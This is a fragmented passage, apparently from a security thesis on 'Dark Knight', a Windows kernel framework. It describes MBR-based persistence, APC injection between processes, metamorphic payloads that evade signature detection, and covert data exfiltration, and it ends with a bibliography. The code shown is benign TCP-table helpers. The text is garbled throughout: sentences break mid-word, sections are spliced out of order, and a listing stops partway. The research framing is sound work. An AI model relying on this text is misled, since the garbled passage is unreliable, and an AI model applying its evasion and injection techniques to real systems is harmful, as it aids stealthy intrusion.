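    "CLOSE_WAIT", "CLOSING", "LAST_ACK", "TIME_WAIT",
    "DELETE_TCB"
};

/* Map a state value to its name; out-of-range values yield "UNKNOWN"
   instead of indexing past the end of the table. */
const char *TcpStateName(unsigned long dwState)
{
    size_t n = sizeof(kTcpStateNames) / sizeof(kTcpStateNames[0]);

    return (dwState < n) ? kTcpStateNames[dwState] : kTcpStateNames[0];
}

/* Swap the two low bytes to recover the host-order port number. */
unsigned int PortFromRow(unsigned long dwPort)
{
    return (unsigned int)(((dwPort & 0xFFUL) << 8) | ((dwPort >> 8) & 0xFFUL));
}

/* Return 1 if port appears in the caller-supplied watch list, else 0. */
int IsWatchedPort(unsigned int port, const unsigned int *watch, size_t nWatch)
{
    size_t i;

    for (i = 0; i < nWatch; i++) {
        if (watch[i] == port)
            return 1;
    }
    return 0;
}
```

Bounding the lookup matters because the state value comes from a table the program does not control; an unexpected value should degrade to UNKNOWN rather than read out of bounds.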
All of the HIDS detection techniques outlined in this subsection can be
used by our framework. They can be implemented as user-mode programs linked
against the WIN32 API and injected into user-mode processes. Results are collected
via kernel-mode to user-mode interaction in the core driver. That being said, a full
implementation of a HIDS is beyond the scope of our work. A HIDS is an integral
requirement for a complete analysis framework to locate and identify the malicious
threat; however, the primary goal of our research is the covert analysis of the threat
for the purpose of intelligence gathering and exfiltration. The development of a HIDS
component to aid Dark Knight should be considered in future work.
4.4 Summary
This chapter has outlined the design of our counter-intelligence framework, Dark
Listing 4.16: Listing TCP connections based on the OS kernel’s TCP table.
static char ccTcpState[][16] = {
    "UNKNOWN", "CLOSED", "LISTENING", "SYN_SENT",
    "SYN_RCVD", "ESTABLISHED", "FIN_WAIT1", "FIN_WAIT2",
    "CLOSE_WAIT", "CLOSING", "LAST_ACK", "TIME_WAIT",
    "DELETE_TCB"
};
void HidsGetTcpPorts()
{
    WSADATA wsaData;
    PMIB_TCPTABLE pmibTcpTable;
    DWORD dwSize = 0;
    WORD wVersion = MAKEWORD(1, 1);
    servent *seServ;
    char *cState;
counter-intelligence operations.
By utilizing the techniques described in Section 2.6.1 we are able to maintain a
persistent footprint on the box using MBR modifications. This allows bootstrap-
ping the main Dark Knight kernel-mode component prior to OS loading conditioning
complishing a wide range of tasks. This includes the utilization of generic shellcode
sequences as well as the dynamic instrumentation of suspicious binaries. We can
also create payloads utilizing network sockets, USB, or any other medium in order to
exfiltrate our collected intelligence. This thereby satisfies our data exfiltration crite-
ria. Finally, we investigate HIDS payloads capable of performing anomaly detection
lined in Section 2.2. We have achieved a suitable stealth capability while maintaining
direct access to rich OS structures and functionality as well as any pertinent infor-
mation that may be located on the target system, circumventing semantic gap com-
plications. We are also able to identify and manipulate emerging or existing threats
and exfiltrate data collected through the course of the operation, thereby supporting
counter-intelligence operations.
Chapter 5
The main investigation of this thesis involves the identification and implementation of
novel techniques to support counter-intelligence operations. This endows investigators
with the tools to aid in establishing the identity and capability of attackers performing
computer system and network intrusions as well as the objective and scale of the
associated breaches.
Chapter 2 begins with a survey of the rootkit field (performed in Sections 2.2-2.4)
outlining the factors having the greatest impact on counter-intelligence operations.
tion 2.6 continues, delving into the innards of Windows NT-based kernels to identify
mechanisms of interest to achieve a persistent footprint and enable the calling of
APCs. Section 2.7 brings Chapter 2 together, creating a cohesive roadmap for this
thesis.
Chapter 3 provides a blueprint of APCs and explores the tactical capabilities they
provide in order to justify their use in our work. This invokes a full investigation of
injection as exposed by APCs. Injection enables the insertion and execution of a pay-
load into a target process’ address space masking the payload’s origin. Injection via
ter 3.
This concluding chapter offers a comparison of the developed techniques to prior
work as well as a look at the significance and validity of each of the techniques. Lastly,
future work and areas of interest are considered, followed by concluding remarks.
5.1 Discussion
interested in comparing our results to that of prior work, assessing the scalability
of our technique for coverage against existing and future implementations of Win-
dows, and evaluating the performance overhead of the Dark Knight implementation.
We finish with a discussion of the implications of this thesis on the current state of
counter-intelligence operations and malicious threats.
out this work share commonalities with previous works, as discussed in Chapter 2. The
similarities and differences between the two are briefly outlined.
Non-exported Functionality
Previous work has explored the utilization of non-exported functionality within Win-
dows NT-based kernels, including works by Barbosa [69], Ionescu [70], Suiche [71],
and Okolica and Peterson [72]. The FU and FUTo rootkits furthered this work by
performing inline disassembly to access the PspCidTable [36]. Our research into this
subject was not meant to identify new non-exported functionality, but rather to uti-
lize it in a way that scales to all versions of Windows by reconstructing interfaces and
mapping the desired functionality.
Injection
Our APC injection technique is similar to
the methods employed in both the TDL4 [57, 67] and ZeroAccess [58, 59] rootkits.
The techniques developed independently through our research differ in the calling
mechanisms we use to construct memory segments in target processes and threads as
well as the methodology associated with injecting and executing the payloads. These
differences are discussed in Chapter 3, alongside alternative techniques that could
potentially be employed to accomplish this task.
In Chapter 2 we mentioned that the primary focus of our research into the
Sidewinder technique is derived from the Magenta rootkit. Although our work shares
a common goal, no evidence exists supporting the existence of Magenta, and as such
we cannot directly compare our results with those of the previous work in this field.
5.1.2 Scalability
The Dark Knight framework was developed and tested primarily on Windows XP
with Service Pack 3 installed; however, initial testing was also performed on Vista to
verify the scalability of the technique. Based on the tests performed, the non-exported
functionality exploitation and APC injection, including both Trident and Sidewinder,
extend to all Windows NT-based kernels described in Table 2.2. This ensures the
that these techniques will extend into future NT kernels as long as APC functionality
remains, and the non-exported functionality is not deprecated.
entire OS, otherwise the system becomes inundated while constantly operating at the
APC IRQL, not allowing PASSIVE execution to occur.
5.1.4 Implications
The techniques developed and implemented throughout this work signify an emerg-
ing capability for counter-intelligence operations and malicious code execution alike.
ers. The development of Trident and Sidewinder clearly outlines the capabilities of
APC functionality, whether used by investigative frameworks and HIDS or by malware.
Cases of these techniques being exploited in the wild with malicious intent
have already been identified, as with TDL4 [57, 67] and ZeroAccess [58, 59],
necessitating improved control and detection of APCs within the
Windows kernel.
5.2 Future Work
This section discusses components of Dark Knight that might be explored in future
work as well as further investigations into the discussed techniques that could be
made.
While this work has primarily focused on the capabilities of APCs for use in counter-
intelligence investigations it is important to also consider these capabilities if employed
while evading detection by sysadmins or end users. Further investigation into the
identification of signatures relating to malicious APC use is important in the further
The metamorphic payload generator developed with Dark Knight (Section 4.2.2) is
a proof-of-concept. The engine could be improved with the streamlining of all trans-
formations into a single locale, which can be accomplished on-the-fly during code
injection after the address of the mapped memory segment has been returned by
simplifies the process by avoiding the PRE and POST conditions currently required for
payload adjustment.
Although we have also developed two other techniques—PIC DLL injection and
PE injection with relocation table adjustments—these are easy to identify via basic
signature-based detection. Utilizing metamorphic transformation engines, conceiv-
ably in unison with the aforementioned techniques, we are able to better defeat such
detection activities.
Improving collaborative efforts between the Dark Knight framework and HIDS com-
ponents will enable quicker reactive measures during counter-intelligence operations.
By immediately detecting malicious activity the threat can be analyzed more rapidly
and collection can be initiated to gather more information on the threat actor. As
Dark Knight already operates within kernel-mode it is trivial to integrate HIDS mod-
ules into the existing framework to include advanced detection functionality, following
the discussion presented in Section 4.3.3.
5.3 Conclusion
The increasing sophistication of computer system and network attacks against government,
military and corporate machines has necessitated better support for
counter-intelligence operations. Such support enables investigators to better establish
the identity of the attacker and their capability as well as the objective and scale
of the breach. Previous attempts to provide interfaces to the infected systems have
either lacked effective capabilities allowing sophisticated attackers to subvert the in-
vestigation or require significant resources to interface with the system due to the
semantic gap when dealing with virtualization environments.
gap issue. The features identified include the scalable exploitation of non-exported
kernel functionality to aid in the employment of APCs to hide kernel-mode injection
through the execution of payloads in hijacked user-mode address spaces or the evasion
of kernel-mode monitors through the use of rapid APC injection between user-mode
processes and threads. Implementations of these techniques are presented in the Dark
• A blueprint of APCs and how they can be employed for covert payload execution
and exfiltration applications via APC injection. This includes two developed
techniques exploiting APC injection: Trident, kernel-mode to user-mode injec-
tion, and Sidewinder, user-mode to user-mode injection.
Bibliography
[1] Microsoft Developer Network. Do waiting threads receive alerts and APCs?
[2] CBC News. Foreign hackers attack Canadian government. 2011. [Online; ac-
cessed 16-February-2011].
[4] sKyWIper Analysis Team. sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex
[5] N. Falliere, L.O. Murchu, and E. Chien. W32. stuxnet dossier. White paper,
Symantec Corp., Security Response, 2011.
[6] B. Krekel. Capability of the People’s Republic of China to conduct cyber warfare
and computer network exploitation. Technical report, Northrop Grumman Corp,
2009.
[7] B. Blunden. The Rootkit Arsenal: Escape and Evasion in the Dark Corners of
the System. Wordware, 2009.
[8] G. Hoglund and J. Butler. Rootkits: Subverting the Windows kernel. Addison-
Wesley Professional, 2006.
[9] S. Knight and S. Leblanc. When not to pull the plug: The need for net-
work counter-surveillance operations. Cryptology and information security series,
3:226–237, 2009.
[11] D. Ramsbrock. Mitigating the botnet problem: From victim to botmaster. 2008.
[12] L. Litty, H.A. Lagar-Cavilla, and D. Lie. Hypervisor support for identifying
[13] J. Butler and S. Sparks. Windows rootkits of 2005, part one. Security Focus, 2,
2005.
[14] J. Butler and S. Sparks. Windows rootkits of 2005, part two. Security Focus, 2,
2005.
[15] D.D. Nerenberg. A study of rootkit stealth techniques and associated detection
[16] J. Butler and S. Sparks. Windows rootkits of 2005, part three. Security Focus,
2, 2005.
[17] T. Shields. Survey of rootkit technologies and their impact on digital forensics.
Personal Communication, 2008.
[18] F. Adelstein. Live forensics: Diagnosing your system without killing it first.
Communications of the ACM, 49(2):63–66, 2006.
[19] J.S. Alexander, T.R. Dean, and G.S. Knight. Spy vs. Spy: Counter-intelligence
[20] P.M. Chen and B.D. Noble. When virtual is better than real. In hotos, page
0133. Published by the IEEE Computer Society, 2001.
com/security-hacking-tools/SystemHacking/VanquishRootkit/
VanquishRootkit-ReadMe.txt, 2003. [Online; accessed 31-May-2011].
[24] J. Richter. Load your 32 bit DLL into another process’s address space using
INJLIB. Microsoft Systems Journal-US Edition, pages 13–40, 1994.
[27] M.E. Russinovich and D.A. Solomon. Microsoft Windows Internals: Microsoft
Windows Server 2003, Windows XP, and Windows 2000. Microsoft Press Red-
[29] A. Bunten. Unix and Linux based rootkits techniques and countermeasures.
http://www.first.org/conference/2004/papers/c17.pdf, 2004. [Online; accessed
25-May-2011].
cessed 14-June-2011].
[31] G. Hoglund. A *REAL* NT rootkit. Volume 0x09, Issue 0x55, Phile# 0x05 of
[34] E. Florio. When malware meets rootkits. White paper, Symantec Corp., Security
Response, 2005.
[35] Devik and Sd. Linux on-the-fly kernel patching without LKM. Volume 0x0b,
Issue 0x3a, Phile# 0x07 of 0x0e-Phrack Magazine, 2001.
[37] M. Nanavati and B. Kothari. Hidden processes detection using the PspCidTable.
MIEL Labs2010, 2010.
[40] S. Sparks and J. Butler. Shadow Walker: Raising the bar for rootkit detection.
[42] Intel. Intel virtualization technology specification for the IA-32 intel architecture.
2005.
[44] J. Rutkowska. Subverting Vista kernel for fun and profit. Black Hat Briefings,
2006.
[45] D.A. Dai Zovi. Hardware virtualization rootkits. BlackHat Briefings USA, 2006.
[46] S.T. King, P.M. Chen, Y.M. Wang, C. Verbowski, H.J. Wang, and J.R. Lorch.
SubVirt: Implementing malware with virtual machines. In Security and Privacy,
2006 IEEE Symposium on, pages 1–14. IEEE, 2006.
[47] D.J Major. Exploiting system call interfaces to observe attackers in virtual
machines. Royal Military College, 2008.
[48] N.A. Quynh and K. Suzaki. Virt-ICE: Next-generation debugger for malware
analysis. BlackHat Briefings USA, 2010.
Courses/CSCE351/IntelArchitecture/IntelExecutionEnvironment.pdf,
2001. [Online; accessed 21-June-2011].
[50] Intel. Intel 64 and IA-32 architectures software developer’s manual: System
programming guide, part 2. 3B, 2011.
[51] L. Duflot, O. Levillain, B. Morin, and O. Grumelard. Getting into the SMRAM:
[52] S. Embleton, S. Sparks, and C. Zou. SMM rootkits: A new breed of OS inde-
[54] A. Tereshkin and R. Wojtczuk. Introducing Ring-3 rootkits. Black Hat USA,
2009.
[57] E. Rodionov and A. Matrosov. The evolution of TDL: Conquering x64. Technical
14-October-2011].
[59] McAfee Labs Threat Advisory. ZeroAccess rootkit. Technical report, McAfee,
2011.
cessed 27-October-2011].
[61] P. Kleissner. Stoned bootkit: Your PC is now stoned! ..again. Black Hat USA,
2009.
accessed 19-November-2011].
[63] M. Matrosov and E. Rodionov. Defeating x64: The evolution of the TDL rootkit.
Technical report, ESET, 2011.
[64] M. Matrosov and E. Rodionov. TDL4 rebooted. Technical report, ESET, 2011.
[66] Microsoft Developer Network. Patching Policy for x64-based systems. http:
accessed 21-November-2011].
[72] J. Okolica and G.L. Peterson. Windows operating systems agnostic memory
analysis. Digital Investigation, 7:S48–S56, 2010.
27-September-2011].
[77] M.E. Russinovich, D.A. Solomon, and A. Ionescu. Microsoft Windows Internals:
Windows Server 2008 and Windows Vista. Microsoft Press Redmond, WA, 2009.
[78] J. Butler and K. Kendall. Blackout: What really happened. Black Hat USA,
2007, 2007.
07-May-2011].
31-November-2011].
August-2011].
[83] R. Chen. The Old New Thing: Practical Development Throughout the Evolution
[84] M. Pietrek. Peering Inside the PE: A Tour of the Win32 Portable Executable File
Format. http://msdn.microsoft.com/en-us/library/ms809762.aspx, 1994.
[85] Microsoft Developer Network. An In-Depth Look into the Win32 Portable
[87] sk. History and Advances in Windows Shellcode. Volume 0xXX, Issue 0x3e,
Phile# 0x07 of 0x10-Phrack Magazine, 2004.
[89] Y. Bai and H. Kobayashi. Intrusion detection system: Technology and develop-
ment. 2003.
[90] Microsoft Developer Network. Exercising the firewall using C++. http:
//msdn.microsoft.com/en-us/site/aa364726, 2010. [Online; accessed 15-
August-2011].
[93] X. Li, P.K.K. Loh, and F. Tan. Mechanisms of polymorphic and metamorphic
viruses. In Intelligence and Security Informatics Conference (EISIC), 2011 Eu-
Appendix A
All tables are reconstructed based on data acquired using WinDbg and the associated
SDK [73].